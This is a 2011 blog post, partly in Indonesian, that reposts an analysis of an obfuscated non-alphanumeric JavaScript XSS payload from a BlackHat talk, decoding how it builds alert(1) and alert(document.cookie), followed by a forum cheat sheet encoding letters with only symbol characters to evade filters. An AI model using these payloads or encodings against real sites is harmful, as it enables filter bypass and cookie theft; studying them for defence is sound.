javascript ninja

Posted on January 22, 2011. Filed under: Uncategorized | Tags: |

from http://adamcecc.blogspot.com/2011/01/javascript.html

Friday, January 21, 2011

JavaScript ( (__ = !$ + $)[+$] + ({} + $)[_/_] +({} + $)[_/_] )

First off credit where credit is due.

1) I didn’t write this JavaScript.
2) I didn’t find this JavaScript.

I saw it in a slide deck from BlackHat DC 2011. Called XSS Street-Fight. Most of the presentation was dry JavaScript /mod_security, but this caught my eye.

($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+
($$=($_=!”+$)[_/_]+$_[+$])])()[__[_/_]+__
[_+~$]+$_[_]+$$](_/_)

Care to guess what that does?

How about if I type it like this.

($=[$=[]][(__=!$+$)[_=-~-~-~$]+({}+$)[_/_]+
($$=($_=!”+$)[_/_]+$_[+$])])()[__[_/_]+__
[_+~$]+$_[_]+$$](document.cookie)

That’s right this is an alert() if it lands anywhere in
an executable section of JavaScript/dom it pops up the cookie.

Go ahead and put it in a script tag in your browser it will pop up a “1″

That’s when I couldn’t put this down.

First there are really two lines here.

($ = [ $=[]] [ (__ = !$ + $ )[ _ = -~-~-~$] + ({} + $)[_/_] + ( $$ = (
$_ = !” + $)[_/_] + $_[+$] ) ] )()

becomes sort()

[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

becomes alert(1)

Let’s start to tear this apart.

$=[] is a blank array

$=[$=[]] is an array with a reference to an array.

So $ derefs to the value 0.

Now we have a character we can freely reference.

__ = “false”null via (__ = !$ + $ )
_ = -~-~-~$

(The ~ operator in JavaScript means -(N+1) so -~ = +1
if $ = 0 then -~-~-~$ = 3

_ = 3

thus _/_ = 3/3 = 1

(__ = !$ + $ )[ _ = -~-~-~$]
(“false”)[_]
(“false”)[3]
“false”[3] = s

({} + $)[_/_]
(” object”)[_/_]
(” object”)[1]
” object”[1] = o

$$ = ( $_ = !” + $)[_/_]
$$ = ( “true”)[1]
“true”[1] = r

$_[+$] = “true”[0] = t

$_ = “true”null
$$ = rt via

($$ = ( $_ = !” + $)[_/_] + $_[+$] ))

!” = “true”
$_ = (true)
$_[1] = r
$_[0] = t
$$ = rt

Thus the first line becomes sort()

($ = [ $=[]] ["s" + "o"+ "r"+ "t" ] )()

Sort takes a function as it’s parameter to
execute thus firing the second line

[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

$ = 0
_ = 3
__ = “false”
$! = “true”
$$ = “rt”

[__[_/_]+__[_+~$]+$_[_]+$$](_/_)

becomes
[__[1] + __[3 + -1] + $![3] + $$)(1);

becomes
["false"[1] + “false”[3 + -1 ] + “true”[3] + “rt”] (1)

[ a + l + e + r + t ](1)

alert(1)

Enjoy!

Posted by adamcecc at 1:43 PM

 

dan ini contekan buat ganti alphanumeric

from : http://sla.ckers.org/forum/read.php?24,33349,33405

Java/script: no alnum cheat sheets
Posted by: SW
Date: February 09, 2010 09:12PM

 

Cheat sheets of the shortest ways we can find to accomplish things with different no alnum charsets.

Feel free to fill in different charsets and of course if you find a shorter version of a letter post it.

Charset: []()+ (seemingly impossible to execute with)

0: 3: +[]
1: 11: ++[[]][+[]]
2: 20: ++[++[[]][+[]]][+[]]
3: 29: ++[++[++[[]][+[]]][+[]]][+[]]
10: 17: ++[[]][+[]]+[+[]]

undefined: 6: [][[]]
Infinity: 86: +(++[[]][+[]]+([+[][[]]]+[][[]])[++[[]][+[]]+[+[]]]+[++[[]][+[]]]+[+[]]+[+[]]+[+[]])
NaN: 7: +[][[]]

a: 25: "NaN"[1]
   (+[][[]]+[])[++[[]][+[]]]
b:  :
c:  :
d: 33: "undefined"[2]
   ([][[]]+[])[++[++[[]][+[]]][+[]]]
e: 37: "NaNundefined"[10]
   ([+[][[]]]+[][[]])[++[[]][+[]]+[+[]]]
f: 51: "undefined"[4]
   ([][[]]+[])[++[++[++[++[[]][+[]]][+[]]][+[]]][+[]]]
g:  :
h:  :
i: 60: "undefined"[5]
   ([][[]]+[])[++[++[++[++[++[[]][+[]]][+[]]][+[]]][+[]]][+[]]]
j:  :
k:  :
l:  :
m:  :
n: 24: "undefined"[1]
   ([][[]]+[])[++[[]][+[]]]
o:  :
p:  :
q:  :
r:  :
s:  :
t:  :
u: 16: "undefined"[0]
   ([][[]]+[])[+[]]
v:  :
w:  :
x:  :
y: 108: "NaNInfinity"[10]
   (+[![]]+[+(++[[]][+[]]+([+[][[]]]+[][[]])[++[[]][+[]]+[+[]]]+[++[[]][+[]]]+[+[]]+[+[]]+[+[]])])[+!+[]+[+[]]]
z:  :  

A:  :
B:  :
C:  :
D:  :
E:  :
F:  :
G:  :
H:  :
I: 94: "Infinity"[0]
   (+(++[[]][+[]]+([+[][[]]]+[][[]])[++[[]][+[]]+[+[]]]+[++[[]][+[]]]+[+[]]+[+[]]+[+[]])+[])[+[]]
J:  :
K:  :
L:  :
M:  :
N: 17: "NaN"[0]
   (+[][[]]+[])[+[]]
O:  :
P:  :
Q:  :
R:  :
S:  :
T:  :
U:  :
V:  :
W:  :
X:  :
Y:  :
Z:  :

Charset: []()+! (six with !)

0: 3: +[]
1: 5: +!+[]
2: 9: !+[]+!+[]
3: 14: !+[]+!+[]+!+[]
10: 11: +!+[]+[+[]]

undefined: 6: [][[]]
Infinity: 60: +(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]]+[+[]])
NaN: 6: +[![]]
true: 4: !![]
false: 3: ![]

a: 15: "false"[1]
   (![]+[])[+!+[]]
b: 424: ([]["sort"]["call"]()+[])[2]
   ([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]
c: 144: ([]["filter"]+[])[3]
   ([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]
d: 22: "undefined"[2]
   ([][[]]+[])[!+[]+!+[]]
e: 27: "true"[3]
   (!+[]+[])[!+[]+!+[]+!+[]]
f: 13: "false"[0]
   (![]+[])[+[]]
g:  :
h:  : []["sort"]["call"]()["atob"]("aN")[0]
i: 27: "falseundefined"[10]
   ([![]]+[][[]])[+!+[]+[+[]]]
j: 429: ([]["sort"]["call"]()+[])[3]
   ([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]+!+[]]
k:  :
l: 19: "false"[2]
   (![]+[])[!+[]+!+[]]
m: 730: (0["constructor"]+[])[11]
   ((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]
n: 18: "undefined"[1]
   ([][[]]+[])[+!+[]]
o: 143: (true+[]["filter"])[10]
   (!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]
p:  :
q:  :
r: 16: "true"[1]
   (!![]+[])[+!+[]]
s: 24: "false"[3]
   (![]+[])[!+[]+!+[]+!+[]]
t: 16: "true"[1]
   (!![]+[])[+!+[]]
u: 15: "undefined"[0]
   ([][[]]+[])[+[]]
v:  :
w:  : "[object Window]"[13]
x:  :
y: 84: "NaNInfinity"[10]
   (+[![]]+[+(+!+[]+(!+[]+[])[!+[]+!+[]+!+[]]+[+!+[]]+[+[]]+[+[]]+[+[]])])[+!+[]+[+[]]]
z:  :  

A:  :
B: 731: 0+false["constructor"][10]
   (+[]+(![])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+[]]]
C: 1048: []["sort"]["call"]()["atob"]("10N")[1]
   ([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]
D:  :
E:  :
F: 1047: []["sort"]["call"]()["atob"]("10a")[1]
   ([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(![]+[])[+!+[]])[+!+[]]
G:  :
H:  :
I: 94: "Infinity"[0]
   (+(++[[]][+[]]+([+[][[]]]+[][[]])[++[[]][+[]]+[+[]]]+[++[[]][+[]]]+[+[]]+[+[]]+[+[]])+[])[+[]]
J:  :
K:  :
L:  :
M:  : []["sort"]["call"]()["btoa"](0)[0]
N: 16: "NaN"[0]
   (+[![]]+[])[+[]]
O:  :
P:  :
Q:  : []["sort"]["call"]()["btoa"]("a")[1]
R:  :
S:  :
T:  :
U:  :
V:  :
W:  : "true[object Window]"[12]
X:  :
Y:  : []["sort"]["call"]()["btoa"]("a")[0]
Z:  : []["sort"]["call"]()["btoa"]("f")[0]

Charset: []()+= (six with = bit longer but might be more useful if using 1 variable)

true: 9: ([]==+[])
false: 8: ([]==[])

a:  :
b:  :
c:  :
d:  :
e:  :
f: 18: "false"[0]
   (([]==[])+[])[+[]]
g:  :
h:  :
i:  :
j:  :
k:  :
l:  :
m:  :
n:  :
o:  :
p:  :
q:  :
r:  :
s:  :
t: 19: "true"[0]
   (([]==+[])+[])[+[]]
u:  :
v:  :
w:  :
x:  :
y:  :
z:  :  

A:  :
B:  :
C:  :
D:  :
E:  :
F:  :
G:  :
H:  :
I:  :
J:  :
K:  :
L:  :
M:  :
N:  :
O:  :
P:  :
Q:  :
R:  :
S:  :
T:  :
U:  :
V:  :
W:  :
X:  :
Y:  :
Z:  :

Charset: []()+!{}/., (everything?)

a:  :
b:  :
c:  :
d:  :
e:  :
f:  :
g:  :
h:  :
i:  :
j:  :
k:  :
l:  :
m:  :
n:  :
o:  :
p:  :
q:  :
r:  :
s:  :
t:  :
u:  :
v:  :
w:  :
x:  :
y:  :
z:  :  

A:  :
B:  :
C:  :
D:  :
E:  :
F:  :
G:  :
H:  :
I:  :
J:  :
K:  :
L:  :
M:  :
N:  :
O:  :
P:  :
Q:  :
R:  :
S:  :
T:  :
U:  :
V:  :
W:  :
X:  :
Y:  :
Z:  :

Edited 16 time(s). Last edit at 02/10/2010 08:23PM by SW.

nunggu sampai semua karakter dapet :p
trus daripada luw bego ngapalinnya ni ada alat bantunya
http://discogscounter.getfreehosting.co.uk/js-noalnum.php
ok udah lama ga posting sekali nya posting bikin sakit kepala
Advertisement

Make a Comment

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Cancel

Connecting to %s

One Response to “javascript ninja”

RSS Feed for BlueJune Comments RSS Feed

good ga ada karakter yg hilang huweh di filter pake opho yo :p

bluejune
January 22, 2011

Reply

Where's The Comment Form?

Liked it here?
Why not try sites on the blogroll...

Follow

Get every new post delivered to your Inbox.